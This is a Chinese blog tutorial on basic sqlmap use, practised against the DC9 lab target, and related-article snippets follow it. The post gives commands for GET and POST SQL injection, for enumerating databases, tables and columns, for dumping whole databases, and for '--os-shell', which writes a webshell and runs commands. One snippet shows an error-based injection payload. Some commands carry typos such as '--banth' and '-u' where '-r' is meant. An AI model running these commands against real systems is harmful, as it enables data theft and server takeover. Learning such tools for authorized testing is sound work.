sqlmap基本使用方法

最新推荐文章于 2024-04-06 04:22:09 发布
最新推荐文章于 2024-04-06 04:22:09 发布
阅读量3.3k 收藏 4
点赞数
分类专栏: 工具使用 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54030686/article/details/125488569
版权

本文只介绍sqlmap的简单使用方法,参考官方文档

https://github.com/sqlmapproject/sqlmap/wiki/Usage

csdn师傅

https://blog.csdn.net/Breeze_CAT/article/details/80628392

个人建议,具体参数直接看csdn师傅的即可,本文以DC9靶场作为目标进行练习,使用sqlmap获取目标数据或权限

GET型

sqlmap -u http://192.168.43.143/ceshi.php?id=1 --banth --level 4

-u 输入自己的目标地址
--batch 自动输入选项的属性值
--level 设置测试的等级(1-5,默认为1)lv2:cookie注入; lv3:user-agent注入,lv4:refere注入; lv5:host注入
POST型
可以获取对应地址的请求包,使用bp抓包保存即可

sqlmap -u ceshi.txt --batch --level 4

或者

sqlmap -u http://192.168.43.143/results.php   --method=POST --data="search=1" --level 4 --batch

--method 选择传参的方式
--data 选择传入的参数

sqlmap -u http://192.168.43.143/results.php   --method=POST --data="search=1" --level 4 --batch --random-agent

--random-agent 采用随机UA头
sqlmap -r ceshi.txt --batch --current-db 查看当前数据库
--current-db 查看当前数据库
查询数据库内容
查看拥有的数据库名称

sqlmap -r ceshi.txt --batch --dbs --level 4

选择数据库,查询表名

sqlmap -r cesh.txt --batch -D shujuku --tables

查询表格内列名

sqlmap -r ceshi.txt --batch -D shjuku -T biao --columns

查看表格内某些列内容

sqlmap -r ceshi.txt --batch -D shujuku -T biao -C id,username --dump

--dump 下载的意思,前面跟的参数是需要下载的内容

sqlmap -r ceshi.txt --batch --dump-all

--dump-all 代表下载全部的意思,也就是脱裤操作
查看数据库,表格内容的对应关系

sqlmap -r ceshi.txt --schema

--schema 目标数据库数据库系统管理模式,类似于拓扑图的一种
写入木马,执行命令

sqlmap -r ceshi.txt --os-shell

sqlmap会自动查找路径写入shell
指纹识别

sqlmap -r ceshi.txt -f --dbs

当目标存在注入时,使用-f参数即可获取到目标的操作系统信息

天下是个小趴菜
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
App端user-agent请求头大全,几千个ua
10-15
常见的app端ua请求头,适合爬虫和测试人员
【web安全】——HTTP请求头注入
Demo不是emo的博客
01-10 4534
http请求头注入操作
sqlmap使用
xu_daren的博客
02-09 2575
sqlmap -r 请求数据包 –thread(1-10)调线程 –current --db 爆破当前数据库 -d“DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME”—— 直接链接数据库 -u ——指定url -l<.log文件>——从log文件个解析目标 -m <文本文件>——从文件中解析目标 -g <搜索内容>——以google搜索结果作为目标,注意搜索内容中引号要注意转义 请求、认证类参数 –method=&
sqlmap工具常用参数_sqlmap参数配置,那些BAT大厂的网络安全面试官到底在想些什么
最新发布
m0_61369227的博客
04-06 549
-level | 设置注入探测等级共有五个等级,默认为1级, 这个参数不仅影响使用哪些payload同时也会影响测试的注入点,GET和POST的数据都会测试,HTTP Cookie在level为2的时候就会测试,HTTP User-Agent/Referer头在level为3的时候就会测试。| --os-shell | 获取主机shell,一般不太好用,因为没权限 || --is-dba | 判断当前用户是否为数据库管理员权限 || --dump-all | 拖库 |
sqlmap使用
Likhaooo的博客
04-05 179
文章目录sqlmap介绍get注入检测级别属性头注入sqlmap*优先指定检测注入执行命令自定义请求包注入注入的选择其他 sqlmap介绍 sqlmap是一款自动化得sql注入工具,主要功能扫描判断是否存在sql注入漏洞,发现并利用给定得url得sql注入漏洞 get注入 sqlmap.py -u “url” 检测 sqlmap.py -u “url” --dbs 爆出数据库名 sqlmap.py -u “url” --tables -D “数据库名” 爆表 sqlmap.py -u “url” --col
史上最全Sqlmap手册
hackzkaq的博客
08-04 907
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 一.介绍 开源的SQL注入漏洞检测的工具,能够检测动态页面中的get/post参数,cookie,http头,还能够查看数据,文件系统访问,甚至能够操作系统命令执行。 检测方式:布尔盲注、时间盲注、报错注入、UNION联合查询注入、堆叠注入 支持数据库:Mysql、Oracle、PostgreSQL、MSSQL、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDb 二.基本参数.
sqlmap使用总结
buffedon的博客
06-11 555
sqlmap使用总结1. 基本用法2. 使用sqlmap探测waf并绕过3. python脚本绕过网站4. 伪造http referer头部探测风险等级5. 执行语句6. 从数据库读文件7. 上传文件到数据库 1. 基本用法 sqlmap -r http.txt #http.txt是我们抓取的http的请求包 sqlmap -r http.txt -p username #指定参数,当有多个参数而你又知道username参数存在SQL漏洞,你就可以使用-p指定参数进行探测 sqlmap -u "
UA头注入Cookie注入Referer注入
十五年游戏主程转渗透之路
04-09 4980
UA头注入,Cookie注入,Referer注入
SQLMap使用|命令大全(干货)
qq_45719090的博客
02-27 1万+
适合新手的sqlmap使用教程,附带sqlmap命令
sqlmap笔记
m0_47599604的博客
03-13 529
SQLmap简介与配置 SQLMAP的强大之处在于对数据库指纹的识别、数据库枚举、数据库提取、访问目标文件系统、并在获取完全的操作权限时执行任意命令,他支持以下几种独特的输入: 基于布尔类型的注入,即可根据返回页面判断条件真假的注入; 基于时间的盲注,即不能根据页面返回判断的时候,利用时间线是否延时来判断条件的真假; 基于报错的注入,即页面会返回错误信息,或者把注入的语句的结果直接返回到页面中,比如数据库报错的信息等; 联合查询注入,即可以使用union的情况下注入; 堆叠查询注入,即可以..
记录一次ua头注入
qq_40800734的博客
07-06 1037
打开一看 随便提交点啥 题目名称是sql,结合题意考虑是ua头注入 抓包,添加一个单引号果然报错了 尝试注入 看回显猜测原语句应该是这种$query = sprintf("INSERT INTO visits (ua, user,passwd) VALUES ('%s', '%s','%s')", 尝试闭合' ,updatexml(1,concat('##',(database())),0))# 这里由于没有插入user参数,没有成功返回 继续', 'xZ',updat.
网络安全原理与应用:SQL工具注入.pptx
05-16
掌握使用常见SQL注入工具进行SQL注入的方法; SQL工具注入 一、SQL工具注入 1、SQLMap 通过之前知识点的学习,我们了解到SQL注入的基本流程之后,SQL注入攻击原理简单,但是过程繁琐,特别是SQL盲注,需要重复地进行...
NoSQL自动攻击测试工具NoSQLMap.zip
07-19
NoSQLMap是一款开源...使用方法启动./nosqlmap.py或python nosqlmap.py.基本菜单1-Set options (do this first) 2-NoSQL DB Access Attacks 3-NoSQL Web App attacks 4-Exit 标签:NoSQLMap
iBATIS实战
11-13
5.1 更新数据的基本方法 82 5.1.1 用于非查询SQL语句的SqlMap API 82 5.1.2 非查询已映射语句 83 5.2 插入数据 84 5.2.1 使用内联参数映射 84 5.2.2 使用外部参数映射 85 5.2.3 自动生成的键 86 5.3 更新和删除数据 ...
Spring-Reference_zh_CN(Spring中文参考手册)
06-06
创建SqlMap 12.5.2.2. 使用 SqlMapTemplate 和 SqlMapDaoSupport 12.5.3. iBATIS SQL Maps 2.x 12.5.3.1. 创建SqlMapClient 12.5.3.2. 使用 SqlMapClientTemplate 和 SqlMapClientDaoSupport 12.5.3.3. 基于原生...
SQL注入攻击与防御(安全技术经典译丛)
02-19
 4.10.1 Sqlmap  4.10.2 Bobcat  4.10.3 BSQL  4.10.4 其他工具  4.11 本章小结  4.12 快速解决方案  4.13 常见问题解答 第5章 SQL盲注利用  5.1 概述  5.2 寻找并确认SQL盲注  5.2.1 强制产生...
sqlmap用法详解
热门推荐
hirak0的博客
09-07 1万+
输出详细等级 选项:-v 该选项用于设置输出信息的详细等级,共有七个级别。默认级别为 1,输出包括普通信息,警告,错误,关键信息和 Python 出错回遡信息(如果有的话)。 0:只输出 Python 出错回溯信息,错误和关键信息。 1:增加输出普通信息和警告信息。 2:增加输出调试信息。 3:增加输出已注入的 payloads。 4:增加输出 HTTP 请求。 5:增加输出 HTTP 响应头 6:增加输出 HTTP 响应内容。 使用等级 2 能更好地了解 sqlmap 内部实现了什么,特别是在检测阶段
使用sqlmapua注入
wutiangui的博客
10-01 1019
测试环境:bWAPP SQL Injection - Stored (User-Agent)
使用SQLmap进行UA注入(User-Agent注入)
zyx_aplomb的博客
08-29 560
使用sqlmap进行UA注入时的一些关键点
sqlmap基本使用方法
08-24
SQLMap是一种常见的SQL注入工具,用于发现和利用Web应用程序中的SQL注入漏洞。它可以自动检测和利用各种类型的SQL注入漏洞,并提供了丰富的选项和功能来帮助进行渗透测试。 基本使用方法如下: 1. 安装SQLMap:你可以从官方网站下载SQLMap的最新版本,并按照官方文档中提供的说明进行安装。 2. 目标URL:使用`-u`参数指定目标URL。例如,`sqlmap.py -u http://example.com/page?id=1`。 3. 请求方法使用`--method`参数指定请求方法,例如GET、POST或DELETE。例如,`sqlmap.py --method=GET -u http://example.com/page?id=1`。 4. 数据参数:如果目标URL是通过POST方法发送数据的,你可以使用`--data`参数指定数据参数。例如,`sqlmap.py --data="username=admin&password=123456" -u http://example.com/login`。 5. 数据库和表:你可以使用`-D`参数指定数据库名称,`--tables`参数列出数据库中的表。例如,`sqlmap.py -D dbname --tables -u http://example.com/page?id=1`。 6. 自动检测:SQLMap可以自动检测目标URL中是否存在SQL注入漏洞。你可以使用`--dbs`参数列出所有可用的数据库。例如,`sqlmap.py --dbs -u http://example.com/page?id=1`。 7. 进一步利用:一旦发现了SQL注入漏洞,你可以使用SQLMap的其他选项和功能来进一步利用漏洞,例如获取数据库中的数据、提取敏感信息等。你可以查阅SQLMap的官方文档了解更多详细的用法。 请注意,在进行任何渗透测试活动之前,确保已获得合法授权,并且仅在合法和合规的环境中使用SQLMap工具。 引用,,<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [网络安全原理与应用:SQL工具注入.pptx](https://download.csdn.net/download/u011062044/85388971)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [sqlmap基本使用方法](https://blog.csdn.net/jayjaydream/article/details/108555660)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值